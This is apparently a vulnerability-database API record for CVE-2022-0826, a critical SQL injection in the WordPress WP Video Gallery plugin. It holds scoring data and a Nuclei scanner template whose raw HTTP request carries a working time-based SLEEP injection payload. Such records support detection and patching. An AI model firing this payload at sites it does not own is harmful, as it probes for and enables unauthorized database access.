{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-0826/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-0826/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-0826/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-0826/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-0826/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-0826"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-0826"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.09127,
      "kev": false,
      "percentile": 0.95087
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-0826.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-0826\n\ninfo:\n  name: WordPress WP Video Gallery <=1.7.1 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.\n  remediation: |\n    Update to the latest version of WP Video Gallery plugin (>=1.7.2) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5\n    - https://wordpress.org/plugins/wp-video-gallery-free/\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0826\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/cyllective/CVEs\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-0826\n    cwe-id: CWE-89\n    epss-score: 0.09127\n    epss-percentile: 0.95087\n    cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: wp-video-gallery-free_project\n    product: wp-video-gallery-free\n    framework: wordpress\n  tags: time-based-sqli,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 15s\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wp_video_gallery_ajax_add_single_youtube&url=http://oast.me/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=6'\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(body, \"Registred videos :\")'\n        condition: and\n# digest: 4a0a00473045022100ea9f77d9cafecd1888857c824637930f24a9e154d8ec97885cd146822fdfcb1a022049583bfc4743b111ccbbaf03674a00cde8197d4d2f5b2ba5bd61020280eb1c29:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-0826"
}